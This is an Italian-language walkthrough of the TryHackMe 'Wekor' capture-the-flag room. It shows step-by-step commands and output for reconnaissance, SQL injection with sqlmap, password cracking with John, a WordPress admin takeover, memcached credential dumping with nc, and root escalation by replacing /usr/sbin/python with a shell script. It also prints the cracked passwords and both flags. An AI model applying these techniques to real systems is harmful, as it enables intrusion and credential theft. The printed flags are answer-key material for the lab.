Ecco a voi una Write-up di questa room!
LINK ROOM: https://tryhackme.com/room/wekorra
LINK PROFILO TRYHACKME: https://tryhackme.com/p/samueleex
Iniziamo subito con una scansione Nmap:
┌──(user㉿parrot)-[/data/Wekor]
└─$ echo "10.10.207.93 wekor.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.207.93 wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Possiamo notare che la maggior parte delle pagine porta ad un errore 404 ma possiamo analizzarle:
┌──(user㉿parrot)-[/data/Wekor]
└─$ for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done
/workshop/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/root/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/lol/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/agent/
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/feed
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/crawler
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/boot
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
---
/comingreallysoon
HTTP/1.1 301 Moved Permanently
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://wekor.thm/comingreallysoon/
Content-Type: text/html; charset=iso-8859-1
---
/interesting
HTTP/1.1 404 Not Found
Date: Tue, 11 May 2021 16:27:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
Infatti:
┌──(user㉿parrot)-[/data/Wekor]
└─$ curl -s http://wekor.thm/comingreallysoon/
Welcome Dear Client!
We've setup our latest website on /it-next, Please go check it out!
If you have any comments or suggestions, please tweet them to @faketwitteraccount!
Thanks a lot !
Nelle scansioni possiamo notare che nella pagina it_cart.php c'è una vulnerabilità di tipo SQL injection.
In questo caso possiamo monitorare il traffico con BurpSuite, salvare la richiesta POST e usare sqlmap per scaricare il database:
┌──(user㉿parrot)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ ll
total 24
coupons
information_schema
mysql
performance_schema
sys
wordpress
Elenco del database di Wordpress:
┌──(user㉿parrot)-[~/…/sqlmap/output/wekor.thm/dump]
└─$ tree wordpress
wordpress
├── option_value-36999631.bin
├── post_content-15186792.bin
├── wp_comments.csv
├── wp_options.csv
├── wp_postmeta.csv
├── wp_posts.csv
├── wp_term_relationships.csv
├── wp_terms.csv
├── wp_term_taxonomy.csv
├── wp_usermeta.csv
└── wp_users.csv
┌──(user㉿parrot)-[~/…/output/wekor.thm/dump/wordpress]
└─$ cat wp_users.csv
Ora che abbiamo craccato tutte le password tranne quella dell'admin (tentativo di Brute Force):
┌──(user㉿parrot)-[/data/Wekor/files]
└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 1 ⚙
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou (wp_jeffrey)
xxxxxx (wp_eagle)
soccer13 (wp_yura)
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
Ora abbiamo queste informazioni:
- admin: (non abbiamo ancora ottenuto la password)
- wp_eagle: Iscritto
- wp_jeffrey: Iscritto
- wp_yura: amministratore
Ora, il sito http://site.wekor.thm/wordpress porta a un'installazione di Wordpress. Andiamo su http://site.wekor.thm/wordpress/wp-admin/ e proviamo le credenziali trovate in precedenza. Provando i 3 account notiamo che wp_yura possiede i privilegi di amministratore.
Proviamo con il reverse shell:
Eseguiamo linpeas.sh:
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3010 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
Abbiamo in esecuzione servizi solo per localhost, 1 dei quali sulla porta 11211.
Verifichiamo se possiamo scaricare le informazioni memorizzate nella cache:
www-data@osboxes:/$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211
echo "stats items" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
STAT items:1:number 5
STAT items:1:age 1361
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
www-data@osboxes:/$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1620801753 s]
ITEM email [14 b; 1620801753 s]
ITEM salary [8 b; 1620801753 s]
ITEM password [15 b; 1620801753 s]
ITEM username [4 b; 1620801753 s]
END
www-data@osboxes:/$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
echo "get username" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
OrkAiSC00L24/7$
END
Ora abbiamo ottenuto la password di Orka: OrkAiSC00L24/7$
www-data@osboxes:/$ su Orka
su Orka
Password: OrkAiSC00L24/7$
Orka@osboxes:~$ cat /home/Orka/user.txt
1a26a6d51c0172400add0e297608dec6
Ecco la User Flag: 1a26a6d51c0172400add0e297608dec6
Ora che abbiamo trovato la User Flag troviamo la Root Flag!
Orka@osboxes:/$ cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
cat > /usr/sbin/python << EOF
> #!/bin/bash
> /bin/bash
> EOF
Orka@osboxes:/$ chmod +x /usr/sbin/python
chmod +x /usr/sbin/python
Orka@osboxes:/$ sudo /home/Orka/Desktop/bitcoin
sudo /home/Orka/Desktop/bitcoin
Enter the password : password
password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 20
20
root@osboxes:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7
Root Flag: f4e788f87cc3afaecbaf0f0fe9ae6ad7